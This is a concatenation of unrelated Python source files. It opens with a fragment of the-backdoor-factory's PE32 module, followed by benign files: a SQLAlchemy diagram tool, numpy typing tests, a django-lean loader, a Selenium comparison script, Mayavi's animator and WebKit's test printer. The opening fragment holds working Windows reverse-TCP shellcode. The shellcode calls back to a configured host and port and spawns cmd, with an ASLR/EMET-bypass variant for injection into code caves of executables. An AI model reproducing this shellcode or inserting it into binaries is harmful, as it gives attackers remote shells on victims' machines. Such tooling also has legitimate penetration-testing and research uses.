len(self.shellcode1) - 3)
else:
self.shellcode1 += "\x89\x00\x00\x00"
self.shellcode1 += ("\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86"
)
self.shellcode2 = ("\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68"
)
self.shellcode2 += self.pack_ip_addresses() # IP
self.shellcode2 += ("\x68\x02\x00")
self.shellcode2 += struct.pack('!h', self.PORT) # PORT
self.shellcode2 += ("\x89\xe6\x6a\x10\x56"
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
#The NOP in the line below allows for continued execution.
"\xe0\x4e\x90\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
"\x81\xc4\xfc\x01\x00\x00"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def iat_reverse_tcp(self, flItms, CavesPicked={}):
"""
Position dependent shellcode that uses API thunks of LoadLibraryA and
GetProcAddress to find and load APIs for callback to C2.
Bypasses EMET 4.1. Idea from Jared DeMott:
http://labs.bromium.com/2014/02/24/bypassing-emet-4-1/
via @bannedit0 (twitter handle)
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
if 'LoadLibraryA' not in flItms:
print "[!] Binary does not have the LoadLibraryA API in IAT"
return False
if 'GetProcAddress' not in flItms:
print "[!] Binary does not have GetProcAddress API in IAT"
return False
#### BEGIN ASLR BYPASS ####
# This works because we know the original entry point of the application and
# where we are supposed to be as we control where our shellcode goes
self.shellcode1 = "\xfc" # CLD
self.shellcode1 += "\xbb" # mov value below ebx
if flItms['NewCodeCave'] is True:
if 'CodeCaveVirtualAddress' in flItms:
#Current address if not in ASLR
self.shellcode1 += struct.pack("<I", (flItms['CodeCaveVirtualAddress'] +
len(self.shellcode1) +
len(self.stackpreserve) +
flItms['buffer'] + 201
)
)
else:
self.shellcode += '\x00x\x00\x00\x00'
else:
if flItms['CavesPicked'] == {}:
self.shellcode1 += '\x00\x00\x00\x00'
else:
for section in flItms['Sections']:
if section[0] == flItms['CavesPicked'][0][0]:
VirtualLOCofSection = section[2]
diskLOCofSection = section[4]
#Current address if not in ASLR
self.shellcode1 += struct.pack("<I", int(flItms['CavesPicked'][0][1], 16) -
diskLOCofSection +
VirtualLOCofSection +
flItms['ImageBase'] +
len(self.shellcode1) +
len(self.stackpreserve) +
9)
self.shellcode1 += "\xe8\x00\x00\x00\x00"
self.shellcode1 += "\x5e" # pop esi
self.shellcode1 += "\x2b\xf3" # sub esi,ebx
self.shellcode1 += "\x83\xfe\x00" # cmp esi,0
self.shellcode1 += "\xbb" # mov value below to EBX
self.shellcode1 += struct.pack("<I", flItms['LoadLibraryA'])
self.shellcode1 += "\xb9" # mov value below to ECX
self.shellcode1 += struct.pack("<I", flItms['GetProcAddress'])
# Don't jump if in ASLR env
self.shellcode1 += "\x74\x15" # JZ (XX) # Jump to location after ALSR check
#Find the base addr
#Base address difference now in ESI
self.shellcode1 += "\xb8" # mov eax, Normal imagebase
self.shellcode1 += struct.pack("<I", flItms['ImageBase'])
self.shellcode1 += "\x03\xc6" # add eax, esi # NOW YOU HAVE ASLR IMAGEBASE in EAX
self.shellcode1 += "\xbb" # mov ebx, the loadlibA offset
self.shellcode1 += struct.pack("<I", flItms['LoadLibraryAOffset'])
self.shellcode1 += "\xb9" # mov ecx, the getprocaddr offset
self.shellcode1 += struct.pack("<I", flItms['GetProcAddressOffset'])
self.shellcode1 += "\x03\xd8" # add ebx, eax #EBX will hold LoadlibAoffset
self.shellcode1 += "\x01\xc1" # add ecx, eax #ECX will hold Getprocaddress
####END ASLR BYPASS####
self.shellcode1 += ("\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x87\xF1\xFF\x13\x68"
"\x75\x70\x00\x00\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x50"
"\x97\xFF\x16\x95\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\xFF\xD5\x68"
"\x74\x41\x00\x00\x68\x6F\x63\x6B\x65\x68\x57\x53\x41\x53\x54\x57"
"\xFF\x16\x95\x31\xC0\x50\x50\x50\x50\x40\x50\x40\x50\xFF\xD5\x95"
"\x68\x65\x63\x74\x00\x68\x63\x6F\x6E\x6E\x54\x57\xFF\x16\x87\xCD"
"\x95\x6A\x05\x68")
self.shellcode1 += self.pack_ip_addresses() # HOST
self.shellcode1 += "\x68\x02\x00"
self.shellcode1 += struct.pack('!h', self.PORT) # PORT
self.shellcode1 += ("\x89\xE2\x6A"
"\x10\x52\x51\x87\xF9\xFF\xD5"
)
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9" # JMP opcode
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
self.shellcode2 = ("\x85\xC0\x74\x00\x6A\x00\x68\x65\x6C"
"\x33\x32\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x73\x41\x00\x00\x68"
"\x6F\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\x50"
"\xFF\x16\x95\x93\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x87\xFE"
"\x92\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01"
"\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56"
"\x56\x53\x56\x87\xDA\xFF\xD5\x89\xE6\x6A\x00\x68\x65\x6C\x33\x32"
"\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x65\x63\x74\x00\x68\x65\x4F"
"\x62\x6A\x68\x69\x6E\x67\x6C\x68\x46\x6F\x72\x53\x68\x57\x61\x69"
"\x74\x54\x50\x95\xFF\x17\x95\x89\xF2\x31\xF6\x4E\x56\x46\x89\xD4"
"\xFF\x32\x96\xFF\xD5\x81\xC4\x34\x02\x00\x00"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
| 0x0mar/the-backdoor-factory | intel/WinIntelPE32.py | Python | bsd-3-clause | 36,465 |
# -*- coding: utf-8 -*-
"""
Program for generating plantuml or dot format
of a database tables by connection string
\n\nDatabase connection string - http://goo.gl/3GpnE
"""
import operator
import string
from optparse import OptionParser
from sqlalchemy import create_engine, MetaData
from tsadisplay import describe, render, __version__
def run():
"""Command for reflection database objects"""
parser = OptionParser(
version=__version__, description=__doc__,
)
parser.add_option(
'-u', '--url', dest='url',
help='Database URL (connection string)',
)
parser.add_option(
'-r', '--render', dest='render', default='dot',
choices=['plantuml', 'dot'],
help='Output format - plantuml or dot',
)
parser.add_option(
'-l', '--list', dest='list', action='store_true',
help='Output database list of tables and exit',
)
parser.add_option(
'-i', '--include', dest='include',
help='List of tables to include through ","',
)
parser.add_option(
'-e', '--exclude', dest='exclude',
help='List of tables to exlude through ","',
)
(options, args) = parser.parse_args()
if not options.url:
print('-u/--url option required')
exit(1)
engine = create_engine(options.url)
meta = MetaData()
meta.reflect(bind=engine)
if options.list:
print('Database tables:')
tables = sorted(meta.tables.keys())
def _g(l, i):
try:
return tables[i]
except IndexError:
return ''
for i in range(0, len(tables), 2):
print(' {0}{1}{2}'.format(
_g(tables, i),
' ' * (38 - len(_g(tables, i))),
_g(tables, i + 1),
))
exit(0)
tables = set(meta.tables.keys())
if options.include:
tables &= set(map(string.strip, options.include.split(',')))
if options.exclude:
tables -= set(map(string.strip, options.exclude.split(',')))
desc = describe(map(lambda x: operator.getitem(meta.tables, x), tables))
print(getattr(render, options.render)(desc))
| Equitable/trump | docs/diagrams/tsadisplay/reflect.py | Python | bsd-3-clause | 2,199 |
from __future__ import annotations
import re
import sys
from typing import Any, Callable, TypeVar
from pathlib import Path
import numpy as np
import numpy.typing as npt
AR_f8: npt.NDArray[np.float64]
AR_i8: npt.NDArray[np.int64]
bool_obj: bool
suppress_obj: np.testing.suppress_warnings
FT = TypeVar("FT", bound=Callable[..., Any])
def func() -> int: ...
def func2(
x: npt.NDArray[np.number[Any]],
y: npt.NDArray[np.number[Any]],
) -> npt.NDArray[np.bool_]: ...
reveal_type(np.testing.KnownFailureException()) # E: KnownFailureException
reveal_type(np.testing.IgnoreException()) # E: IgnoreException
reveal_type(np.testing.clear_and_catch_warnings(modules=[np.testing])) # E: _clear_and_catch_warnings_without_records
reveal_type(np.testing.clear_and_catch_warnings(True)) # E: _clear_and_catch_warnings_with_records
reveal_type(np.testing.clear_and_catch_warnings(False)) # E: _clear_and_catch_warnings_without_records
reveal_type(np.testing.clear_and_catch_warnings(bool_obj)) # E: clear_and_catch_warnings
reveal_type(np.testing.clear_and_catch_warnings.class_modules) # E: tuple[types.ModuleType]
reveal_type(np.testing.clear_and_catch_warnings.modules) # E: set[types.ModuleType]
with np.testing.clear_and_catch_warnings(True) as c1:
reveal_type(c1) # E: builtins.list[warnings.WarningMessage]
with np.testing.clear_and_catch_warnings() as c2:
reveal_type(c2) # E: None
reveal_type(np.testing.suppress_warnings("once")) # E: suppress_warnings
reveal_type(np.testing.suppress_warnings()(func)) # E: def () -> builtins.int
reveal_type(suppress_obj.filter(RuntimeWarning)) # E: None
reveal_type(suppress_obj.record(RuntimeWarning)) # E: list[warnings.WarningMessage]
with suppress_obj as c3:
reveal_type(c3) # E: suppress_warnings
reveal_type(np.testing.verbose) # E: int
reveal_type(np.testing.IS_PYPY) # E: bool
reveal_type(np.testing.HAS_REFCOUNT) # E: bool
reveal_type(np.testing.HAS_LAPACK64) # E: bool
reveal_type(np.testing.assert_(1, msg="test")) # E: None
reveal_type(np.testing.assert_(2, msg=lambda: "test")) # E: None
if sys.platform == "win32" or sys.platform == "cygwin":
reveal_type(np.testing.memusage()) # E: builtins.int
elif sys.platform == "linux":
reveal_type(np.testing.memusage()) # E: Union[None, builtins.int]
else:
reveal_type(np.testing.memusage()) # E: <nothing>
reveal_type(np.testing.jiffies()) # E: builtins.int
reveal_type(np.testing.build_err_msg([0, 1, 2], "test")) # E: str
reveal_type(np.testing.build_err_msg(range(2), "test", header="header")) # E: str
reveal_type(np.testing.build_err_msg(np.arange(9).reshape(3, 3), "test", verbose=False)) # E: str
reveal_type(np.testing.build_err_msg("abc", "test", names=["x", "y"])) # E: str
reveal_type(np.testing.build_err_msg([1.0, 2.0], "test", precision=5)) # E: str
reveal_type(np.testing.assert_equal({1}, {1})) # E: None
reveal_type(np.testing.assert_equal([1, 2, 3], [1, 2, 3], err_msg="fail")) # E: None
reveal_type(np.testing.assert_equal(1, 1.0, verbose=True)) # E: None
reveal_type(np.testing.print_assert_equal('Test XYZ of func xyz', [0, 1], [0, 1])) # E: None
reveal_type(np.testing.assert_almost_equal(1.0, 1.1)) # E: None
reveal_type(np.testing.assert_almost_equal([1, 2, 3], [1, 2, 3], err_msg="fail")) # E: None
reveal_type(np.testing.assert_almost_equal(1, 1.0, verbose=True)) # E: None
reveal_type(np.testing.assert_almost_equal(1, 1.0001, decimal=2)) # E: None
reveal_type(np.testing.assert_approx_equal(1.0, 1.1)) # E: None
reveal_type(np.testing.assert_approx_equal("1", "2", err_msg="fail")) # E: None
reveal_type(np.testing.assert_approx_equal(1, 1.0, verbose=True)) # E: None
reveal_type(np.testing.assert_approx_equal(1, 1.0001, significant=2)) # E: None
reveal_type(np.testing.assert_array_compare(func2, AR_i8, AR_f8, err_msg="test")) # E: None
reveal_type(np.testing.assert_array_compare(func2, AR_i8, AR_f8, verbose=True)) # E: None
reveal_type(np.testing.assert_array_compare(func2, AR_i8, AR_f8, header="header")) # E: None
reveal_type(np.testing.assert_array_compare(func2, AR_i8, AR_f8, precision=np.int64())) # E: None
reveal_type(np.testing.assert_array_compare(func2, AR_i8, AR_f8, equal_nan=False)) # E: None
reveal_type(np.testing.assert_array_compare(func2, AR_i8, AR_f8, equal_inf=True)) # E: None
reveal_type(np.testing.assert_array_equal(AR_i8, AR_f8)) # E: None
reveal_type(np.testing.assert_array_equal(AR_i8, AR_f8, err_msg="test")) # E: None
reveal_type(np.testing.assert_array_equal(AR_i8, AR_f8, verbose=True)) # E: None
reveal_type(np.testing.assert_array_almost_equal(AR_i8, AR_f8)) # E: None
reveal_type(np.testing.assert_array_almost_equal(AR_i8, AR_f8, err_msg="test")) # E: None
reveal_type(np.testing.assert_array_almost_equal(AR_i8, AR_f8, verbose=True)) # E: None
reveal_type(np.testing.assert_array_almost_equal(AR_i8, AR_f8, decimal=1)) # E: None
reveal_type(np.testing.assert_array_less(AR_i8, AR_f8)) # E: None
reveal_type(np.testing.assert_array_less(AR_i8, AR_f8, err_msg="test")) # E: None
reveal_type(np.testing.assert_array_less(AR_i8, AR_f8, verbose=True)) # E: None
reveal_type(np.testing.runstring("1 + 1", {})) # E: Any
reveal_type(np.testing.runstring("int64() + 1", {"int64": np.int64})) # E: Any
reveal_type(np.testing.assert_string_equal("1", "1")) # E: None
reveal_type(np.testing.rundocs()) # E: None
reveal_type(np.testing.rundocs("test.py")) # E: None
reveal_type(np.testing.rundocs(Path("test.py"), raise_on_error=True)) # E: None
@np.testing.raises(RuntimeError, RuntimeWarning)
def func3(a: int) -> bool: ...
reveal_type(func3) # E: def (a: builtins.int) -> builtins.bool
reveal_type(np.testing.assert_raises(RuntimeWarning)) # E: _AssertRaisesContext[builtins.RuntimeWarning]
reveal_type(np.testing.assert_raises(RuntimeWarning, func3, 5)) # E: None
reveal_type(np.testing.assert_raises_regex(RuntimeWarning, r"test")) # E: _AssertRaisesContext[builtins.RuntimeWarning]
reveal_type(np.testing.assert_raises_regex(RuntimeWarning, b"test", func3, 5)) # E: None
reveal_type(np.testing.assert_raises_regex(RuntimeWarning, re.compile(b"test"), func3, 5)) # E: None
class Test: ...
def decorate(a: FT) -> FT:
return a
reveal_type(np.testing.decorate_methods(Test, decorate)) # E: None
reveal_type(np.testing.decorate_methods(Test, decorate, None)) # E: None
reveal_type(np.testing.decorate_methods(Test, decorate, "test")) # E: None
reveal_type(np.testing.decorate_methods(Test, decorate, b"test")) # E: None
reveal_type(np.testing.decorate_methods(Test, decorate, re.compile("test"))) # E: None
reveal_type(np.testing.measure("for i in range(1000): np.sqrt(i**2)")) # E: float
reveal_type(np.testing.measure(b"for i in range(1000): np.sqrt(i**2)", times=5)) # E: float
reveal_type(np.testing.assert_allclose(AR_i8, AR_f8)) # E: None
reveal_type(np.testing.assert_allclose(AR_i8, AR_f8, rtol=0.005)) # E: None
reveal_type(np.testing.assert_allclose(AR_i8, AR_f8, atol=1)) # E: None
reveal_type(np.testing.assert_allclose(AR_i8, AR_f8, equal_nan=True)) # E: None
reveal_type(np.testing.assert_allclose(AR_i8, AR_f8, err_msg="err")) # E: None
reveal_type(np.testing.assert_allclose(AR_i8, AR_f8, verbose=False)) # E: None
reveal_type(np.testing.assert_array_almost_equal_nulp(AR_i8, AR_f8, nulp=2)) # E: None
reveal_type(np.testing.assert_array_max_ulp(AR_i8, AR_f8, maxulp=2)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.testing.assert_array_max_ulp(AR_i8, AR_f8, dtype=np.float32)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.testing.assert_warns(RuntimeWarning)) # E: _GeneratorContextManager[None]
reveal_type(np.testing.assert_warns(RuntimeWarning, func3, 5)) # E: bool
reveal_type(np.testing.assert_no_warnings()) # E: _GeneratorContextManager[None]
reveal_type(np.testing.assert_no_warnings(func3, 5)) # E: bool
reveal_type(np.testing.tempdir("test_dir")) # E: _GeneratorContextManager[builtins.str]
reveal_type(np.testing.tempdir(prefix=b"test")) # E: _GeneratorContextManager[builtins.bytes]
reveal_type(np.testing.tempdir("test_dir", dir=Path("here"))) # E: _GeneratorContextManager[builtins.str]
reveal_type(np.testing.temppath("test_dir", text=True)) # E: _GeneratorContextManager[builtins.str]
reveal_type(np.testing.temppath(prefix=b"test")) # E: _GeneratorContextManager[builtins.bytes]
reveal_type(np.testing.temppath("test_dir", dir=Path("here"))) # E: _GeneratorContextManager[builtins.str]
reveal_type(np.testing.assert_no_gc_cycles()) # E: _GeneratorContextManager[None]
reveal_type(np.testing.assert_no_gc_cycles(func3, 5)) # E: None
reveal_type(np.testing.break_cycles()) # E: None
reveal_type(np.testing.TestCase()) # E: unittest.case.TestCase
reveal_type(np.testing.run_module_suite(file_to_run="numpy/tests/test_matlib.py")) # E: None
| simongibbons/numpy | numpy/typing/tests/data/reveal/testing.py | Python | bsd-3-clause | 8,824 |
# -*- coding: utf-8 -*-
import logging, os, sys
l = logging.getLogger(__name__)
from django.conf import settings
import json
from django_lean.experiments.models import Experiment
class ExperimentLoader(object):
"""
Loads the experiments from a file containing a list of experiment
It will add new experiments, but not touch existing experiments
"""
NAME_ATTRIBUTE="name"
ALLOWED_ATTRIBUTES=[NAME_ATTRIBUTE]
APPLICATION_RELATIVE_EXPERIMENT_FILE = "%sexperiments.json" % os.sep
__loaded = False
@classmethod
def load_all_experiments(cls, apps=settings.INSTALLED_APPS):
"""
Loads experiments for all applications in settings.INSTALLED_APPS
"""
if not cls.__loaded:
cls.__loaded = True
for app_name in apps:
application_path = os.path.dirname(sys.modules[app_name].__file__)
application_experiment_file_path = (
application_path +
ExperimentLoader.APPLICATION_RELATIVE_EXPERIMENT_FILE)
if os.access(application_experiment_file_path, os.F_OK):
ExperimentLoader.load_experiments(application_experiment_file_path)
@staticmethod
def load_experiments(filename):
"""
Will load the data from the filename, expected data format to be
JSON : [{ name : "name" }]
"""
fp = open(filename)
experiment_names = None
try:
experiment_names = json.load(fp)
except Exception as e:
l.error("Unable to parse experiment file %s: %s" % (filename, e))
raise e
finally:
fp.close()
for entry in experiment_names:
for key in entry.keys():
if key not in ExperimentLoader.ALLOWED_ATTRIBUTES:
l.warning("Ignoring unrecognized key %s on experiment "
"definition %s in filename %s" %
(key, entry, filename))
if ExperimentLoader.NAME_ATTRIBUTE in entry:
Experiment.objects.get_or_create(
name=entry.get(ExperimentLoader.NAME_ATTRIBUTE))
else:
l.warning("Invalid entry in experiment file %s : %s" %
(filename, entry))
| uhuramedia/django-lean | django_lean/experiments/loader.py | Python | bsd-3-clause | 2,347 |
import sys
import requests
try:
from .helper import *
except SystemError:
from helper import *
def compareRequestsAndSelenium(url):
html1 = str(requests.get(url).text)
try:
driver = webdriver.Firefox()
driver.maximize_window()
driver.get(url)
html2 = str(driver.page_source)
finally:
driver.close()
view_diff(url, html1, html2)
# url = 'http://www.healthgrades.com/physician/dr-jeannine-villella-y4jts'
# compareRequestsAndSelenium(url)
# url = 'https://www.betterdoctor.com/wendy-tcheng'
# compareRequestsAndSelenium(url)
if __name__ == '__main__':
compareRequestsAndSelenium(sys.argv[1])
| bgarrels/sky | sky/legacy/comparison.py | Python | bsd-3-clause | 685 |
"""
Simple utility code for animations.
"""
# Author: Prabhu Ramachandran <prabhu at aerodotiitbdotacdotin>
# Copyright (c) 2009, Enthought, Inc.
# License: BSD Style.
import types
from functools import wraps
try:
from decorator import decorator
HAS_DECORATOR = True
except ImportError:
HAS_DECORATOR = False
from pyface.timer.api import Timer
from traits.api import HasTraits, Button, Instance, Range
from traitsui.api import View, Group, Item
###############################################################################
# `Animator` class.
###############################################################################
class Animator(HasTraits):
""" Convenience class to manage a timer and present a convenient
UI. This is based on the code in `tvtk.tools.visual`.
Here is a simple example of using this class::
>>> from mayavi import mlab
>>> def anim():
... f = mlab.gcf()
... while 1:
... f.scene.camera.azimuth(10)
... f.scene.render()
... yield
...
>>> anim = anim()
>>> t = Animator(500, anim.next)
>>> t.edit_traits()
This makes it very easy to animate your visualizations and control
it from a simple UI.
**Notes**
If you want to modify the data plotted by an `mlab` function call,
please refer to the section on: :ref:`mlab-animating-data`
"""
########################################
# Traits.
start = Button('Start Animation')
stop = Button('Stop Animation')
delay = Range(10, 100000, 500,
desc='frequency with which timer is called')
# The internal timer we manage.
timer = Instance(Timer)
######################################################################
# User interface view
traits_view = View(Group(Item('start'),
Item('stop'),
show_labels=False),
Item('_'),
Item(name='delay'),
title='Animation Controller',
buttons=['OK'])
######################################################################
# Initialize object
def __init__(self, millisec, callable, *args, **kwargs):
"""Constructor.
**Parameters**
:millisec: int specifying the delay in milliseconds
between calls to the callable.
:callable: callable function to call after the specified
delay.
:\*args: optional arguments to be passed to the callable.
:\*\*kwargs: optional keyword arguments to be passed to the callable.
"""
HasTraits.__init__(self)
self.delay = millisec
self.ui = None
self.timer = Timer(millisec, callable, *args, **kwargs)
######################################################################
# `Animator` protocol.
######################################################################
def show(self):
"""Show the animator UI.
"""
self.ui = self.edit_traits()
def close(self):
"""Close the animator UI.
"""
if self.ui is not None:
self.ui.dispose()
######################################################################
# Non-public methods, Event handlers
def _start_fired(self):
self.timer.Start(self.delay)
def _stop_fired(self):
self.timer.Stop()
def _delay_changed(self, value):
t = self.timer
if t is None:
return
if t.IsRunning():
t.Stop()
t.Start(value)
###############################################################################
# Decorators.
def animate(func=None, delay=500, ui=True):
""" A convenient decorator to animate a generator that performs an
animation. The `delay` parameter specifies the delay (in
milliseconds) between calls to the decorated function. If `ui` is
True, then a simple UI for the animator is also popped up. The
decorated function will return the `Animator` instance used and a
user may call its `Stop` method to stop the animation.
If an ordinary function is decorated a `TypeError` will be raised.
**Parameters**
:delay: int specifying the time interval in milliseconds between
calls to the function.
:ui: bool specifying if a UI controlling the animation is to be
provided.
**Returns**
The decorated function returns an `Animator` instance.
**Examples**
Here is the example provided in the Animator class documentation::
>>> from mayavi import mlab
>>> @mlab.animate
... def anim():
... f = mlab.gcf()
... while 1:
... f.scene.camera.azimuth(10)
... f.scene.render()
... yield
...
>>> a = anim() # Starts the animation.
For more specialized use you can pass arguments to the decorator::
>>> from mayavi import mlab
>>> @mlab.animate(delay=500, ui=False)
... def anim():
... f = mlab.gcf()
... while 1:
... f.scene.camera.azimuth(10)
... f.scene.render()
... yield
...
>>> a = anim() # Starts the animation without a UI.
**Notes**
If you want to modify the data plotted by an `mlab` function call,
please refer to the section on: :ref:`mlab-animating-data`.
"""
class Wrapper(object):
# The wrapper which calls the decorated function.
def __init__(self, function):
self.func = function
self.ui = ui
self.delay = delay
def __call__(self, *args, **kw):
if isinstance(self.func, types.GeneratorType):
f = self.func
else:
f = self.func(*args, **kw)
if isinstance(f, types.GeneratorType):
a = Animator(self.delay, f.next)
if self.ui:
a.show()
return a
else:
msg = 'The function "%s" must be a generator '\
'(use yield)!' % (self.func.__name__)
raise TypeError(msg)
def decorator_call(self, func, *args, **kw):
return self(*args, **kw)
def _wrapper(function):
# Needed to create the Wrapper in the right scope.
if HAS_DECORATOR:
# The decorator calls a callable with (func, *args, **kw) signature
return decorator(Wrapper(function).decorator_call, function)
else:
return wraps(function)(Wrapper(function))
if func is None:
return _wrapper
else:
return _wrapper(func)
| liulion/mayavi | mayavi/tools/animator.py | Python | bsd-3-clause | 7,087 |
# Copyright (C) 2010, 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Package that handles non-debug, non-file output for run-webkit-tests."""
import math
import optparse
from webkitpy.tool import grammar
from webkitpy.layout_tests.models import test_expectations
from webkitpy.layout_tests.models.test_expectations import TestExpectations, TestExpectationParser
from webkitpy.layout_tests.views.metered_stream import MeteredStream
NUM_SLOW_TESTS_TO_LOG = 10
def print_options():
return [
optparse.make_option('--debug-rwt-logging', action='store_true', default=False,
help='print timestamps and debug information for run-webkit-tests itself'),
optparse.make_option('--details', action='store_true', default=False,
help='print detailed results for every test'),
optparse.make_option('-q', '--quiet', action='store_true', default=False,
help='run quietly (errors, warnings, and progress only)'),
optparse.make_option('--timing', action='store_true', default=False,
help='display test times (summary plus per-test w/ --verbose)'),
optparse.make_option('-v', '--verbose', action='store_true', default=False,
help='print a summarized result for every test (one line per test)'),
]
class Printer(object):
"""Class handling all non-debug-logging printing done by run-webkit-tests."""
def __init__(self, port, options, regular_output, logger=None):
self.num_completed = 0
self.num_tests = 0
self._port = port
self._options = options
self._meter = MeteredStream(regular_output, options.debug_rwt_logging, logger=logger,
number_of_columns=self._port.host.platform.terminal_width())
self._running_tests = []
self._completed_tests = []
def cleanup(self):
self._meter.cleanup()
def __del__(self):
self.cleanup()
def print_config(self, results_directory):
self._print_default("Using port '%s'" % self._port.name())
self._print_default("Test configuration: %s" % self._port.test_configuration())
self._print_default("View the test results at file://%s/results.html" % results_directory)
if self._options.enable_versioned_results:
self._print_default("View the archived results dashboard at file://%s/dashboard.html" % results_directory)
# FIXME: should these options be in printing_options?
if self._options.new_baseline:
self._print_default("Placing new baselines in %s" % self._port.baseline_path())
fs = self._port.host.filesystem
fallback_path = [fs.split(x)[1] for x in self._port.baseline_search_path()]
self._print_default("Baseline search path: %s -> generic" % " -> ".join(fallback_path))
self._print_default("Using %s build" % self._options.configuration)
if self._options.pixel_tests:
self._print_default("Pixel tests enabled")
else:
self._print_default("Pixel tests disabled")
self._print_default("Regular timeout: %s, slow test timeout: %s" %
(self._options.time_out_ms, self._options.slow_time_out_ms))
self._print_default('Command line: ' + ' '.join(self._port.driver_cmd_line()))
self._print_default('')
def print_found(self, num_all_test_files, num_to_run, repeat_each, iterations):
found_str = 'Found %s; running %d' % (grammar.pluralize('test', num_all_test_files), num_to_run)
if repeat_each * iterations > 1:
found_str += ' (%d times each: --repeat-each=%d --iterations=%d)' % (repeat_each * iterations, repeat_each, iterations)
found_str += ', skipping %d' % (num_all_test_files - num_to_run)
self._print_default(found_str + '.')
def print_expected(self, run_results, tests_with_result_type_callback):
self._print_expected_results_of_type(run_results, test_expectations.PASS, "passes", tests_with_result_type_callback)
self._print_expected_results_of_type(run_results, test_expectations.FAIL, "failures", tests_with_result_type_callback)
self._print_expected_results_of_type(run_results, test_expectations.FLAKY, "flaky", tests_with_result_type_callback)
self._print_debug('')
def print_workers_and_shards(self, num_workers, num_shards, num_locked_shards):
driver_name = self._port.driver_name()
if num_workers == 1:
self._print_default("Running 1 %s." % driver_name)
self._print_debug("(%s)." % grammar.pluralize('shard', num_shards))
